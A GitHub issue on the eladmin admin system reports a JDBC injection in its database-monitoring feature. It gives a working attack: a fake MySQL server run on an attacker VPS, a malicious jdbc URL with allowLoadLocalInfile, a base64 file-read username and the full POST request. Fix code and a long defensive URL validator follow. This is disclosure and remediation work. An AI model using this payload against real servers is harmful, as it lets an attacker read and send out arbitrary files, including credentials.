elunez / eladmin

eladmin JPA version: a front-end/back-end separated admin management system based on Spring Boot 2.6.4, JPA, Spring Security, Redis and Vue. The project is developed in modules, uses RBAC for access control, supports data dictionaries and data-permission management, one-click generation of front-end and back-end code, and dynamic routing.
https://eladmin.vip/demo
Apache License 2.0

Read any file in the background #839

Open an5er opened 6 months ago

an5er commented 6 months ago

Summary

JDBC Injection in Database Monitoring. Allow users to read any file

Details

Allowing custom URLs in the select-database monitoring feature lets us use arbitrary parameters to cause files to be read. Use the following tool: https://github.com/4ra1n/mysql-fake-server. Execute java -jar fake-mysql-cli-0.0.4.jar on a VPS. Select edit database and put the following payload into the URL:

jdbc:mysql://vps-ip:3308/test?allowLoadLocalInfile=true
base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=


POST /api/database/testConnect HTTP/1.1

{"id":"c4f72159fd87484a90d33c4a7a8619d1","name":"数据库","jdbcUrl":"jdbc:mysql://xxxx:3308/test?allowLoadLocalInfile=true","userName":"base64ZmlsZXJlYWRfRDpcYW41ZXJcZmxhZy50eHQ=","pwd":"root","createBy":"admin","createTime":"2023-12-27 10:51:22","updateBy":"admin","updateTime":"2023-12-27 10:51:22"}

Then click Test to send the request; our tool will output the following message. At the same time, the directory where we started the tool gets a ./fake-server-files directory containing the contents of the files we read.


Impact

It allows an attacker to read any file on the server, including sensitive information, leading to data leakage and serious security threats

Fix sample code:

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.util.Properties;

Properties properties = new Properties();
// Disable client-side LOAD DATA LOCAL INFILE so a malicious server cannot make the client send files
properties.setProperty("allowLoadLocalInfile", "false");
properties.setProperty("allowLoadLocalInfileInPath", "");
Connection conn = DriverManager.getConnection(DB_URL, properties);
```
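As an added example (not eladmin's code and not part of the report above), a hypothetical `JdbcUrlGuard` helper for Java 11+ that goes one step beyond the fix sample: it parses a user-supplied JDBC URL, rejects anything other than a single-host `jdbc:mysql://host[:port]/database` form, rejects every query parameter that is not on an explicit allow-list, and builds connection properties that pin the client-side `LOAD DATA LOCAL` behaviour off. The class name, the contents of `ALLOWED_PARAMS` and the sample URLs in `main` are assumptions for illustration.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Properties;
import java.util.Set;
import java.util.StringJoiner;

// Hypothetical helper (not part of eladmin): validates a user-supplied MySQL JDBC URL
// and builds hardened connection properties before DriverManager.getConnection is called.
public final class JdbcUrlGuard {

    // Assumption: the monitoring feature only ever needs these connection parameters.
    // Any other query parameter is rejected, so driver behaviour cannot be changed from the UI.
    private static final Set<String> ALLOWED_PARAMS = Set.of(
            "useSSL", "serverTimezone", "characterEncoding", "useUnicode");

    private JdbcUrlGuard() {}

    /** Returns a rebuilt jdbc:mysql:// URL containing only allow-listed parameters, or throws. */
    public static String sanitize(String jdbcUrl) {
        if (jdbcUrl == null || !jdbcUrl.startsWith("jdbc:mysql://")) {
            throw new IllegalArgumentException("only jdbc:mysql:// URLs are accepted");
        }
        URI uri;
        try {
            // Strip the "jdbc:" prefix so java.net.URI can parse host, port, path and query.
            uri = new URI(jdbcUrl.substring("jdbc:".length()));
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed JDBC URL", e);
        }
        // Multi-host and address=(...) forms do not parse as a plain URI and end up here
        // with no host; credentials embedded in the authority are refused as well.
        if (uri.getHost() == null || uri.getUserInfo() != null) {
            throw new IllegalArgumentException("JDBC URL must name a single host without credentials");
        }
        String path = uri.getRawPath();
        if (path == null || path.isEmpty() || path.indexOf('/', 1) >= 0) {
            throw new IllegalArgumentException("JDBC URL must be of the form host[:port]/database");
        }

        Map<String, String> kept = new LinkedHashMap<>();
        String query = uri.getRawQuery();
        if (query != null && !query.isEmpty()) {
            for (String pair : query.split("&")) {
                int eq = pair.indexOf('=');
                String key = URLDecoder.decode(eq < 0 ? pair : pair.substring(0, eq), StandardCharsets.UTF_8);
                String value = eq < 0 ? "" : URLDecoder.decode(pair.substring(eq + 1), StandardCharsets.UTF_8);
                // Reject rather than silently drop: the attempt then shows up as an error in the log.
                if (!ALLOWED_PARAMS.contains(key)) {
                    throw new IllegalArgumentException("JDBC parameter not permitted: " + key);
                }
                kept.put(key, value);
            }
        }

        // Rebuild the URL from the validated pieces instead of passing the original string on.
        StringBuilder out = new StringBuilder("jdbc:mysql://").append(uri.getHost());
        if (uri.getPort() > 0) {
            out.append(':').append(uri.getPort());
        }
        out.append(path);
        if (!kept.isEmpty()) {
            StringJoiner qs = new StringJoiner("&", "?", "");
            kept.forEach((k, v) -> qs.add(URLEncoder.encode(k, StandardCharsets.UTF_8) + "="
                    + URLEncoder.encode(v, StandardCharsets.UTF_8)));
            out.append(qs);
        }
        return out.toString();
    }

    /** Connection properties that keep the client from honouring LOAD DATA LOCAL requests. */
    public static Properties hardenedProperties(String user, String password) {
        Properties p = new Properties();
        p.setProperty("user", user);
        p.setProperty("password", password);
        p.setProperty("allowLoadLocalInfile", "false");
        p.setProperty("allowLoadLocalInfileInPath", "");
        p.setProperty("allowUrlInLocalInfile", "false");
        return p;
    }

    public static void main(String[] args) {
        // Constructed inputs: a benign URL and one carrying the parameter from the report.
        String[] inputs = {
            "jdbc:mysql://db.internal:3306/eladmin?useSSL=true&serverTimezone=UTC",
            "jdbc:mysql://vps-ip:3308/test?allowLoadLocalInfile=true",
        };
        for (String in : inputs) {
            try {
                System.out.println("accepted: " + sanitize(in));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + in + " (" + e.getMessage() + ")");
            }
        }
        // Real use: DriverManager.getConnection(sanitize(url), hardenedProperties(user, pwd));
    }
}
```

Running `main` accepts the first URL unchanged and rejects the second with "JDBC parameter not permitted: allowLoadLocalInfile". The two layers are deliberate: the `Properties` object is where the fix sample above puts `allowLoadLocalInfile=false`, and it should stay there so the setting does not depend on the URL at all, but confirm for the driver version in use which of the two wins when a key appears in both, and keep the URL allow-list so that a URL trying to re-enable the option is logged as a rejected request rather than quietly overridden.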